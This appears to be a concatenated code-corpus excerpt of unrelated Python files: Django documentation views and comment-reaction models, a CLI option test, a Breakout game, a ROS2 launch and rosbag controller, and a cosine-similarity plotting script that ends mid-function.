bb5b9e701abf5095d0390b5cf553b81d80794a1b | 5,113 | py | Python | calaccess_website/views/docs/ccdc.py | california-civic-data-coalition/django-calaccess-downloads | 198f3b5b7fca846d9ce7c84f3a5bfa0ff4d3d3f7 | [
"MIT"
] | 3 | 2016-09-16T16:50:31.000Z | 2021-07-30T23:58:29.000Z | calaccess_website/views/docs/ccdc.py | world-admin/django-calaccess-downloads-website | 205480959358f51f4a7f11275fb8f60bd1091025 | [
"MIT"
] | 193 | 2016-05-27T16:34:10.000Z | 2021-09-24T16:11:04.000Z | calaccess_website/views/docs/ccdc.py | world-admin/django-calaccess-downloads-website | 205480959358f51f4a7f11275fb8f60bd1091025 | [
"MIT"
] | 4 | 2016-06-14T00:41:19.000Z | 2022-01-14T00:29:45.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Views for CCDC file documetnation pages.
"""
# Django tricks
from django.apps import apps
from django.http import Http404
from django.urls import reverse
from calaccess_website.templatetags.calaccess_website_tags import slugify
# Models
from calaccess_processed.models import ProcessedDataFile
# Views
from calaccess_website.views import CalAccessModelListMixin
from django.views.generic import DetailView, ListView
def get_ocd_proxy_models():
"""
Return an iterable of all OCD proxy models from the processed_data app.
"""
election_proxies = apps.get_app_config('calaccess_processed_elections').get_ocd_models_map().values()
flat_proxies = apps.get_app_config("calaccess_processed_flatfiles").get_flat_proxy_list()
return list(election_proxies) + list(flat_proxies)
def get_processed_data_files():
"""
Return a tuple of ProcessedDataFile instances for published files.
"""
file_list = [ProcessedDataFile(file_name=m().file_name) for m in get_ocd_proxy_models()]
return sorted(file_list, key=lambda f: f.file_name)
class CcdcFileList(ListView, CalAccessModelListMixin):
template_name = 'calaccess_website/docs/ccdc/file_list.html'
def get_queryset(self):
"""
Returns the CCDC model list with grouped by type.
"""
return self.regroup_by_klass_group(get_processed_data_files())
def get_context_data(self, **kwargs):
context = super(CcdcFileList, self).get_context_data(**kwargs)
context['file_num'] = len(get_processed_data_files())
context['title'] = 'Processed files'
context['description'] = 'Definitions, record layouts and data dictionaries for the \
processed data files released by the California Civic Data Coalition. Recommended for beginners and regular use.'
return context
class BaseFileDetailView(DetailView):
"""
Base class for views providing information about a CCDC data file.
"""
def get_queryset(self):
"""
Returns a list of the ccdc data files as a key dictionary
with the URL slug as the keys.
"""
return dict((slugify(f.file_name), f) for f in get_processed_data_files())
def set_kwargs(self, obj):
self.kwargs = {
'slug': obj
}
def get_object(self):
"""
Returns the file model from the CAL-ACCESS processed data app that
matches the provided slug.
Raises a 404 error if one is not found
"""
key = self.kwargs['slug']
try:
return self.get_queryset()[key.lower()]
except KeyError:
raise Http404
def get_context_data(self, **kwargs):
"""
Add some extra bits to the template's context
"""
file_name = self.kwargs['slug'].replace("-", "")
context = super(BaseFileDetailView, self).get_context_data(**kwargs)
# Pull all previous versions of the provided file
context['version_list'] = ProcessedDataFile.objects.filter(
file_name__icontains=file_name
).order_by(
'-version__raw_version__release_datetime'
).exclude(
version__raw_version__release_datetime__lte='2016-07-27'
)
# note if the most recent version of the file is empty
try:
context['empty'] = context['version_list'][0].records_count == 0
except IndexError:
context['empty'] = True
return context
class CcdcFileDownloadsList(BaseFileDetailView):
"""
A detail page with links to all downloads for the provided CCDC data file.
"""
template_name = 'calaccess_website/docs/ccdc/download_list.html'
def get_url(self, obj):
return reverse('ccdc_file_downloads_list', kwargs=dict(slug=obj))
class CcdcFileDetail(BaseFileDetailView):
"""
A detail page with all documentation for the provided CCDC data file.
"""
template_name = 'calaccess_website/docs/ccdc/file_detail.html'
def get_url(self, obj):
return reverse('ccdc_file_detail', kwargs=dict(slug=obj))
def get_context_data(self, **kwargs):
"""
Add some extra bits to the template's context
"""
context = super(CcdcFileDetail, self).get_context_data(**kwargs)
# Add list of fields to context
context['fields'] = self.get_sorted_fields()
return context
def get_sorted_fields(self):
"""
Return a list of fields (dicts) sorted by name.
"""
field_list = []
for field in self.object.model().get_field_list():
field_data = {
'column': field.name,
'description': field.description,
'help_text': field.help_text,
}
if field.choices and len(field.choices) > 0:
field_data['choices'] = [c for c in field.choices]
else:
field_data['choices'] = None
field_list.append(field_data)
return sorted(field_list, key=lambda k: k['column'])
| 32.775641 | 113 | 0.656171 | 628 | 5,113 | 5.146497 | 0.297771 | 0.020421 | 0.02599 | 0.02599 | 0.256807 | 0.150681 | 0.142327 | 0.103342 | 0.103342 | 0.103342 | 0 | 0.005474 | 0.249756 | 5,113 | 155 | 114 | 32.987097 | 0.83707 | 0.196558 | 0 | 0.151899 | 0 | 0 | 0.108143 | 0.065612 | 0 | 0 | 0 | 0 | 0 | 1 | 0.151899 | false | 0 | 0.088608 | 0.025316 | 0.468354 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bb5c8ea17ee9ecb16f8a2b9c72c06dd3eb1f5f67 | 2,536 | py | Python | comment/models/reactions.py | setayeshmbr/coronavirus_blog | 2bb94e905ac7e5401776ac81fd301a90a24f1a9f | [
"MIT"
] | null | null | null | comment/models/reactions.py | setayeshmbr/coronavirus_blog | 2bb94e905ac7e5401776ac81fd301a90a24f1a9f | [
"MIT"
] | null | null | null | comment/models/reactions.py | setayeshmbr/coronavirus_blog | 2bb94e905ac7e5401776ac81fd301a90a24f1a9f | [
"MIT"
] | null | null | null | from enum import IntEnum, unique
from django.contrib.auth import get_user_model
from django.db import models
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils import timezone
from comment.models import Comment
from comment.managers import ReactionManager, ReactionInstanceManager
class Reaction(models.Model):
comment = models.OneToOneField(Comment, on_delete=models.CASCADE)
likes = models.PositiveIntegerField(default=0)
dislikes = models.PositiveIntegerField(default=0)
objects = ReactionManager()
def _increase_count(self, field):
self.refresh_from_db()
setattr(self, field, models.F(field) + 1)
self.save(update_fields=[field])
def _decrease_count(self, field):
self.refresh_from_db()
setattr(self, field, models.F(field) - 1)
self.save(update_fields=[field])
def increase_reaction_count(self, reaction):
if reaction == ReactionInstance.ReactionType.LIKE.value:
self._increase_count('likes')
else:
self._increase_count('dislikes')
def decrease_reaction_count(self, reaction):
if reaction == ReactionInstance.ReactionType.LIKE.value:
self._decrease_count('likes')
else:
self._decrease_count('dislikes')
class ReactionInstance(models.Model):
@unique
class ReactionType(IntEnum):
LIKE = 1
DISLIKE = 2
CHOICES = [(r.value, r.name) for r in ReactionType]
reaction = models.ForeignKey(Reaction, related_name='reactions', on_delete=models.CASCADE)
user = models.ForeignKey(get_user_model(), related_name='reactions', on_delete=models.CASCADE)
reaction_type = models.SmallIntegerField(choices=CHOICES)
date_reacted = models.DateTimeField(auto_now=timezone.now())
objects = ReactionInstanceManager()
class Meta:
unique_together = ['user', 'reaction']
@receiver(post_delete, sender=ReactionInstance)
def delete_reaction_instance(sender, instance, using, **kwargs):
instance.reaction.decrease_reaction_count(instance.reaction_type)
@receiver(post_save, sender=ReactionInstance)
def add_count(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
instance.reaction.increase_reaction_count(instance.reaction_type)
@receiver(post_save, sender=Comment)
def add_reaction(sender, instance, created, raw, using, update_fields, **kwargs):
if created:
Reaction.objects.create(comment=instance)
| 32.935065 | 98 | 0.729101 | 294 | 2,536 | 6.112245 | 0.27551 | 0.027824 | 0.023372 | 0.035058 | 0.351697 | 0.351697 | 0.351697 | 0.306066 | 0.306066 | 0.244853 | 0 | 0.002859 | 0.172319 | 2,536 | 76 | 99 | 33.368421 | 0.853263 | 0 | 0 | 0.181818 | 0 | 0 | 0.022082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127273 | false | 0 | 0.145455 | 0 | 0.527273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
246de88d2fe441aebedc83fc4f8b906aee07ae8a | 1,394 | py | Python | gorp/test/test_b_option.py | molsonkiko/gorpy | 1dceb8bb530a7c7c558d51cedbbbf1cdc9e6f914 | [
"MIT"
] | null | null | null | gorp/test/test_b_option.py | molsonkiko/gorpy | 1dceb8bb530a7c7c558d51cedbbbf1cdc9e6f914 | [
"MIT"
] | null | null | null | gorp/test/test_b_option.py | molsonkiko/gorpy | 1dceb8bb530a7c7c558d51cedbbbf1cdc9e6f914 | [
"MIT"
] | null | null | null | from gorp.readfiles import *
from gorp.test.test_ku_options import setup_tempdir
import itertools
import unittest
og_dirname = os.getcwd()
def get_combos():
setup_tempdir()
os.chdir(os.path.join(gorpdir, "test", "temp"))
base_query = " -b '[bp]l[uo]t' /."
gorptags = ["-r", "-l", "-h", "-i", "-c", "-o", "-n", "-v"]
tag_combos = (
c
for combos in (itertools.combinations(gorptags, ii) for ii in range(9))
for c in combos
)
query_results = {}
bad_combos = {}
session = GorpSession(print_output=False)
try:
for combo in tag_combos:
Combo = " ".join(combo)
try:
session.receive_query(Combo + base_query)
out = session.old_queries["prev"].resultset
query_results[frozenset(re.findall("[a-z]+", Combo))] = out
except Exception as ex:
bad_combos[frozenset(re.findall("[a-z]+", Combo))] = repr(ex)
finally:
session.close()
os.chdir(og_dirname)
return query_results, bad_combos
class BOptionTester(unittest.TestCase):
def test_b_option(self):
query_results, bad_combos = get_combos()
self.assertFalse(
bad_combos,
"At least one option combo failed with the 'b' option under normal conditions",
)
if __name__ == "__main__":
unittest.main()
| 29.041667 | 91 | 0.58967 | 172 | 1,394 | 4.581395 | 0.52907 | 0.057107 | 0.057107 | 0.079949 | 0.063452 | 0.063452 | 0 | 0 | 0 | 0 | 0 | 0.000996 | 0.27977 | 1,394 | 47 | 92 | 29.659574 | 0.783865 | 0 | 0 | 0.05 | 0 | 0 | 0.1033 | 0 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
246e6304dc03101d69f37d5890c1e8f95b162696 | 45 | py | Python | api/__init__.py | jbrownrs/issue-376-GDS-link | e8cce1b79f46b98a7d24b2da5eca48430fd904a3 | [
"MIT"
] | 5 | 2019-01-07T17:22:34.000Z | 2020-10-08T15:03:12.000Z | api/__init__.py | jbrownrs/issue-376-GDS-link | e8cce1b79f46b98a7d24b2da5eca48430fd904a3 | [
"MIT"
] | 203 | 2017-12-14T09:51:56.000Z | 2018-08-28T14:04:08.000Z | api/__init__.py | jbrownrs/issue-376-GDS-link | e8cce1b79f46b98a7d24b2da5eca48430fd904a3 | [
"MIT"
] | 5 | 2018-10-22T11:36:01.000Z | 2020-07-20T05:47:49.000Z | """
Implement a REST-ful API interface.
"""
| 9 | 35 | 0.644444 | 6 | 45 | 4.833333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 4 | 36 | 11.25 | 0.783784 | 0.777778 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 4 |
2471c183baaffa838c1d8f4a682290146e29d206 | 8,689 | py | Python | stancode_projects/Break out games/breakoutgraphics.py | itinghuang/iting-projects | 304d41fe8a4b3ae45a01611a8868981f31e72d68 | [
"MIT"
] | null | null | null | stancode_projects/Break out games/breakoutgraphics.py | itinghuang/iting-projects | 304d41fe8a4b3ae45a01611a8868981f31e72d68 | [
"MIT"
] | null | null | null | stancode_projects/Break out games/breakoutgraphics.py | itinghuang/iting-projects | 304d41fe8a4b3ae45a01611a8868981f31e72d68 | [
"MIT"
] | null | null | null | """
stanCode Breakout Project
Adapted from Eric Roberts's Breakout by
Sonja Johnson-Yu, Kylie Jue, Nick Bowman,
and Jerry Liao
YOUR DESCRIPTION HERE
"""
from campy.graphics.gwindow import GWindow
from campy.graphics.gobjects import GOval, GRect, GLabel
from campy.gui.events.mouse import onmouseclicked, onmousemoved
import random
# constant
BRICK_SPACING = 5 # Space between bricks (in pixels). This space is used for horizontal and vertical spacing.
BRICK_WIDTH = 40 # Height of a brick (in pixels).
BRICK_HEIGHT = 15 # Height of a brick (in pixels).
BRICK_ROWS = 10 # Number of rows of bricks.
BRICK_COLS = 10 # Number of columns of bricks.
BRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).
BALL_RADIUS = 10 # Radius of the ball (in pixels).
PADDLE_WIDTH = 75 # Width of the paddle (in pixels).
PADDLE_HEIGHT = 15 # Height of the paddle (in pixels).
PADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).
# constants that cannot be changed by user
INITIAL_Y_SPEED = 7.0 # Initial vertical speed for the ball.
MAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.
count = 0 # the Qty of removed bricks
class BreakoutGraphics:
def __init__(self, ball_radius = BALL_RADIUS, paddle_width = PADDLE_WIDTH,
paddle_height = PADDLE_HEIGHT, paddle_offset = PADDLE_OFFSET,
brick_rows = BRICK_ROWS, brick_cols = BRICK_COLS,
brick_width = BRICK_WIDTH, brick_height = BRICK_HEIGHT,
brick_offset = BRICK_OFFSET, brick_spacing = BRICK_SPACING,
title='Breakout'):
# Create a graphical window, with some extra space.
window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing
window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)
self.window = GWindow(width=window_width, height=window_height, title=title)
# Create a paddle.
self.paddle = GRect(PADDLE_WIDTH,PADDLE_HEIGHT,x=(window_width/2-PADDLE_WIDTH/2),y=window_height-PADDLE_OFFSET)
self.paddle.filled = True
self.window.add(self.paddle)
# Center a filled ball in the graphical window.
self.ball = GOval(BALL_RADIUS*2, BALL_RADIUS*2)
self.ball.filled = True
self.window.add(self.ball,x=(window_width/2-BALL_RADIUS), y=window_height/2-PADDLE_OFFSET)
# Initialize our mouse listeners.
onmouseclicked(self.ball_start)
onmousemoved(self.paddle_move)
# Default initial velocity for the ball.
self.__dx = 0
self.__dy = 0
# Default the removed bricks
self.count = 0
# Draw bricks.
for j in range(BRICK_ROWS):
for i in range(BRICK_COLS):
self.brick = GRect(BRICK_WIDTH, BRICK_HEIGHT, x= (BRICK_WIDTH+brick_spacing)*i, y=BRICK_OFFSET+(BRICK_HEIGHT+brick_spacing)*j)
self.brick.filled = True
if j == 0 :
self.brick_color = 'red'
elif j == 2:
self.brick_color = 'orange'
elif j == 4:
self.brick_color = 'yellow'
elif j == 6:
self.brick_color = 'green'
elif j ==8:
self.brick_color = 'blue'
self.brick.fill_color = self.brick_color
self.brick.color = self.brick_color
self.window.add(self.brick)
def paddle_move(self, event):
'''
To set the remove paddle. The paddle will follow the position of mouse
:return: the x of paddle
'''
self.paddle.x = event.x
self.paddle.y = self.window.height-PADDLE_OFFSET
if event.x <= 0:
self.paddle.x = 0
elif event.x >= (self.window.width-self.paddle.width):
self.paddle.x = self.window.width-self.paddle.width
else:
self.paddle.x = event.x
def ball_start(self, event):
'''
If user click the mouse, the moving distance will increase (__dx, __dy) and start the moving.
:return: new __dx, __dy
'''
if self.__dy == 0 and self.__dy == 0:
self.__dy = INITIAL_Y_SPEED
self.__dx = random.randint(1, MAX_X_SPEED)
if random.random > 0.5:
self.__dx = -self.__dx
if random.random > 0.5:
self.__dy = -self.__dy
def window_border(self):
'''
If the ball moved out of the window, the ball will bounce.
:return: new __dx, __dy
'''
if self.ball.x <= 0 or self.ball.x >= (self.window.width-BALL_RADIUS*2):
self.__dx = -self.__dx
elif self.ball.y <= 0:
self.__dy = -self.__dy
def move_to_bottom(self):
'''
If the ball touched the bottom
:return: boolean (True/False)
'''
if self.ball.y >= (self.window.height-BALL_RADIUS*2):
return True
def back_to_start(self):
'''
The ball moves back to the start point to restart the game.
:return: ball.x , ball.y , __dx, __dy
'''
self.ball.x = self.window.width/2-BALL_RADIUS
self.ball.y = self.window.height/2 - BALL_RADIUS
self.__dx = 0
self.__dy = 0
def bounce_ball(self):
'''
if the ball hits the paddle, the ball will bounce.
:return: new __dy
'''
x = self.ball.x
y = self.ball.y
obj = self.window.get_object_at(x, y)
obj2 = self.window.get_object_at(x+2*BALL_RADIUS, y)
obj3 = self.window.get_object_at(x, y+2*BALL_RADIUS)
obj4 = self.window.get_object_at(x+2*BALL_RADIUS, y+2*BALL_RADIUS)
if obj3 == self.paddle:
self.__dy = -self.__dy
elif obj4 == self.paddle:
self.__dy = -self.__dy
elif obj == self.paddle:
self.__dy = -self.__dy
elif obj2 == self.paddle:
self.__dy = -self.__dy
def hit_brick(self):
'''
If the ball hits the brick, the ball will bounce and the brick will be removed.
:return: count, __dy, removed bricks
'''
obj4 = self.window.get_object_at(self.ball.x,self.ball.y)
obj5 = self.window.get_object_at(self.ball.x+2*BALL_RADIUS, self.ball.y)
obj6 = self.window.get_object_at(self.ball.x, self.ball.y+2*BALL_RADIUS)
obj7 = self.window.get_object_at(self.ball.x+2*BALL_RADIUS, self.ball.y+2*BALL_RADIUS)
if obj4 != self.paddle and obj4 != None:
self.window.remove(obj4)
self.count += 1
self.__dy = -self.__dy
elif obj5 != self.paddle and obj5 != None:
self.__dy = -self.__dy
self.count += 1
self.window.remove(obj5)
elif obj6 != self.paddle and obj6 != None:
self.__dy = -self.__dy
self.count += 1
self.window.remove(obj6)
elif obj7 != self.paddle and obj7 != None:
self.__dy = -self.__dy
self.count += 1
self.window.remove(obj7)
def is_win_game(self):
'''
If the game removed all the bricks
:return: boolean (True/False)
'''
if self.count == BRICK_ROWS*BRICK_COLS:
return True
def win_game(self):
'''
If win, the game will over and the win-banner will appear.
:return: sign2, label2
'''
sign2 = GRect(self.window.width, self.window.height, x=0, y=0)
sign2.filled = True
sign2.color = 'yellow'
sign2.fill_color = 'yellow'
self.window.add(sign2)
label2 = GLabel('You win !', x=self.window.width/3.5, y=self.window.height/2)
label2.font = 'Helvetica-35'
label2.color = 'black'
self.window.add(label2)
def end_game(self):
'''
If lose, the game will over and the lose-banner will appear.
:return: sign, label
'''
sign = GRect(self.window.width, self.window.height, x=0, y=0)
sign.filled = True
sign.color = 'red'
sign.fill_color = 'red'
self.window.add(sign)
label = GLabel('You lose', x=self.window.width/3.5, y=self.window.height/2)
label.font = 'Helvetica-35'
label.color = 'black'
self.window.add(label)
# Getter
def get_dx(self):
return self.__dx
# Getter
def get_dy(self):
return self.__dy
# Getter
def get_ball(self):
return self.ball
| 33.941406 | 142 | 0.589711 | 1,176 | 8,689 | 4.167517 | 0.162415 | 0.071414 | 0.026525 | 0.024485 | 0.332177 | 0.289125 | 0.166293 | 0.117323 | 0.106917 | 0.106917 | 0 | 0.019003 | 0.309587 | 8,689 | 255 | 143 | 34.07451 | 0.797966 | 0.214524 | 0 | 0.173333 | 0 | 0 | 0.015601 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093333 | false | 0 | 0.026667 | 0.02 | 0.16 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
24727a12dfdb6e231648e565e4b96e1b20eb8aae | 434 | py | Python | python/src/algorithm/coding/set/setupdate.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/algorithm/coding/set/setupdate.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/algorithm/coding/set/setupdate.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | n = int(input())
s = set(map(int, input().split()))
N = int(input())
for i in range(N):
cmd = input()
B = set(map(int, input().split()))
if "symmetric_difference_update" in cmd:
s.symmetric_difference_update(B)
elif "intersection_update" in cmd:
s.intersection_update(B)
elif "difference_update" in cmd:
s.difference_update(B)
elif "update" in cmd:
s.update(B)
print(sum(s))
| 22.842105 | 44 | 0.615207 | 64 | 434 | 4.046875 | 0.328125 | 0.123552 | 0.169884 | 0.185328 | 0.316602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232719 | 434 | 18 | 45 | 24.111111 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.158986 | 0.062212 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2472a45f4c27ad8a50bc1b6d23712affd350c953 | 4,329 | py | Python | RemoteRunner/Controllers/ROS/ROS2Controller.py | StanSwanborn/robot-runner | 4b8d294d403326b3027eb43e7f9d2b44276bce2b | [
"MIT"
] | 1 | 2020-01-24T21:02:57.000Z | 2020-01-24T21:02:57.000Z | RemoteRunner/Controllers/ROS/ROS2Controller.py | StanSwanborn/robot-runner | 4b8d294d403326b3027eb43e7f9d2b44276bce2b | [
"MIT"
] | null | null | null | RemoteRunner/Controllers/ROS/ROS2Controller.py | StanSwanborn/robot-runner | 4b8d294d403326b3027eb43e7f9d2b44276bce2b | [
"MIT"
] | 1 | 2020-04-06T14:18:39.000Z | 2020-04-06T14:18:39.000Z | import time
from pathlib import Path
from Procedures.ProcessProcedure import ProcessProcedure
from Controllers.ROS.IROSController import IROSController
from Procedures.OutputProcedure import OutputProcedure as output
### =========================================================
### | |
### | ROS2Controller |
### | - Define communications with ROS2 |
### | - ROS2 does not need a roscore process |
### | - Launch a launch file (.launch.py) |
### | - Start ros2 bag recording of topics |
### | - Stop is automatic (for now) |
### | - Define graceful shutdown procedure |
### | for both Native and Sim runs |
### | |
### | * Any function which is implementation |
### | specific (ROS2) should be declared here |
### | |
### =========================================================
class ROS2Controller(IROSController):
def roscore_start(self):
pass # ROS2 does not have / need roscore.
def rosbag_stop_recording_topics(self, bag_name):
pass # TODO: For now OK, needs to terminate ros2bag process in future.
def roslaunch_launch_file(self, launch_file: Path):
output.console_log(f"ros2 launch {launch_file}")
command = f"ros2 launch {launch_file}"
self.roslaunch_proc = ProcessProcedure.subprocess_spawn(command, "ros2_launch_file")
def rosbag_start_recording_topics(self, topics, file_path, bag_name):
file_path += "-ros2"
output.console_log(f"Rosbag2 starts recording...")
output.console_log_bold("Recording topics: ")
# Build 'rosbag record -O filename [/topic1 /topic2 ...] __name:=bag_name' command
command = f" ros2 bag record --output {file_path}"
for topic in topics:
command += f" {topic}"
output.console_log_bold(f" * {topic}")
ProcessProcedure.subprocess_spawn(command, "ros2bag_record")
time.sleep(1) # Give rosbag recording some time to initiate
def sim_shutdown(self):
output.console_log("Shutting down sim run...")
ProcessProcedure.subprocess_call("ros2 service call /reset_simulation std_srvs/srv/Empty {}", "ros2_reset_call")
ProcessProcedure.process_kill_by_name("gzserver")
ProcessProcedure.process_kill_by_name("gzclient")
ProcessProcedure.process_kill_by_name("_ros2_daemon")
ProcessProcedure.process_kill_by_name("ros2")
ProcessProcedure.process_kill_by_cmdline("/opt/ros/")
while ProcessProcedure.process_is_running("gzserver") or \
ProcessProcedure.process_is_running("gzclient") or \
ProcessProcedure.process_is_running("ros2") or \
ProcessProcedure.process_is_running("_ros2_daemon"):
output.console_log_animated("Waiting for graceful exit...")
output.console_log("Sim run successfully shutdown!")
def native_shutdown(self):
output.console_log("Shutting down native run...")
# TODO: Implement this, impossible as of now because of know Linux Kernel bug
# on ARM devices. Raspberry Pi overheats and crashes due to inability to throttle CPU.
# Get all nodes, for each node ros2 lifecycle nodename shutdown
pass
# ======= ROS 1 =======
# output.console_log("Shutting down native run...")
# ProcessProcedure.subprocess_call('rosnode kill -a', "rosnode_kill")
# ProcessProcedure.process_kill_by_name('rosmaster')
# ProcessProcedure.process_kill_by_name('roscore')
# ProcessProcedure.process_kill_by_name('rosout')
#
# while ProcessProcedure.process_is_running('rosmaster') and \
# ProcessProcedure.process_is_running('roscore') and \
# ProcessProcedure.process_is_running('rosout'):
# output.console_log_animated("Waiting for roscore to gracefully exit...")
#
# output.console_log("Native run successfully shutdown!") | 50.929412 | 120 | 0.594364 | 432 | 4,329 | 5.743056 | 0.340278 | 0.139057 | 0.070939 | 0.093511 | 0.293833 | 0.138654 | 0.050786 | 0 | 0 | 0 | 0 | 0.008417 | 0.28644 | 4,329 | 85 | 121 | 50.929412 | 0.794756 | 0.455532 | 0 | 0.073171 | 0 | 0 | 0.191871 | 0 | 0 | 0 | 0 | 0.011765 | 0 | 1 | 0.146341 | false | 0.073171 | 0.121951 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
24740d66448ac9fd6d0157a46216f7339a2b5d04 | 6,035 | py | Python | cosine_similarity.py | caikehe/YELP_DS | c9baa8626a22d6aca2a786e221bff5e184e521d7 | [
"Apache-2.0"
] | null | null | null | cosine_similarity.py | caikehe/YELP_DS | c9baa8626a22d6aca2a786e221bff5e184e521d7 | [
"Apache-2.0"
] | null | null | null | cosine_similarity.py | caikehe/YELP_DS | c9baa8626a22d6aca2a786e221bff5e184e521d7 | [
"Apache-2.0"
] | null | null | null | import io, json, random
import matplotlib.pyplot as plt
from sklearn.metrics.pairwise import pairwise_distances
from matplotlib.backends.backend_pdf import PdfPages
def drawCOSFigure(features, output):
histogram1Star = []
histogram2Star = []
histogram3Star = []
histogram4Star = []
histogram5Star = []
nSamples = 100
metricType = 'cosine'
with open("data/output/cosine_similarity/histogram_1star.json") as oneStarFile:
data = json.load(oneStarFile)
for i, item in enumerate(data):
if i > nSamples:
break
histogram1Star.append(list(item["histogram"][i] for i in features))
with open("data/output/cosine_similarity/histogram_2star.json") as twoStarFile:
data = json.load(twoStarFile)
for i, item in enumerate(data):
if i > nSamples:
break
histogram2Star.append(list(item["histogram"][i] for i in features))
with open("data/output/cosine_similarity/histogram_3star.json") as threeStarFile:
data = json.load(threeStarFile)
for i, item in enumerate(data):
if i > nSamples:
break
histogram3Star.append(list(item["histogram"][i] for i in features))
with open("data/output/cosine_similarity/histogram_4star.json") as fourStarFile:
data = json.load(fourStarFile)
for i, item in enumerate(data):
if i > nSamples:
break
histogram4Star.append(list(item["histogram"][i] for i in features))
with open("data/output/cosine_similarity/histogram_5star.json") as fiveStarFile:
data = json.load(fiveStarFile)
for i, item in enumerate(data):
if i > nSamples:
break
histogram5Star.append(list(item["histogram"][i] for i in features))
matrix1Star = pairwise_distances(histogram1Star, Y=None, metric=metricType, n_jobs=1)
matrix2Star = pairwise_distances(histogram2Star, Y=None, metric=metricType, n_jobs=1)
matrix3Star = pairwise_distances(histogram3Star, Y=None, metric=metricType, n_jobs=1)
matrix4Star = pairwise_distances(histogram4Star, Y=None, metric=metricType, n_jobs=1)
matrix5Star = pairwise_distances(histogram5Star, Y=None, metric=metricType, n_jobs=1)
length = nSamples
x_array1Star = []
y_array1Star = []
x_array2Star = []
y_array2Star = []
x_array3Star = []
y_array3Star = []
x_array4Star = []
y_array4Star = []
x_array5Star = []
y_array5Star = []
left = -0.49
right = 0.49
for i in xrange(0, length):
for j in xrange(i, length):
x = 0.5 + random.uniform(left, right)
y = 1- matrix1Star[i][j]
x_array1Star.append(x)
y_array1Star.append(y)
for i in xrange(0, length):
for j in xrange(i, length):
x = 1.5 + random.uniform(left, right)
y = 1- matrix2Star[i][j]
x_array2Star.append(x)
y_array2Star.append(y)
for i in xrange(0, length):
for j in xrange(i, length):
x = 2.5 + random.uniform(left, right)
y = 1- matrix3Star[i][j]
x_array3Star.append(x)
y_array3Star.append(y)
for i in xrange(0, length):
for j in xrange(i, length):
x = 3.5 + random.uniform(left, right)
y = 1- matrix4Star[i][j]
x_array4Star.append(x)
y_array4Star.append(y)
for i in xrange(0, length):
for j in xrange(i, length):
x = 4.5 + random.uniform(left, right)
y = 1- matrix5Star[i][j]
x_array5Star.append(x)
y_array5Star.append(y)
pp = PdfPages(output)
plt.figure()
plt.plot(x_array1Star, y_array1Star, 'ro', markersize=2.0)
plt.plot(x_array2Star, y_array2Star, 'ro', markersize=2.0)
plt.plot(x_array3Star, y_array3Star, 'ro', markersize=2.0)
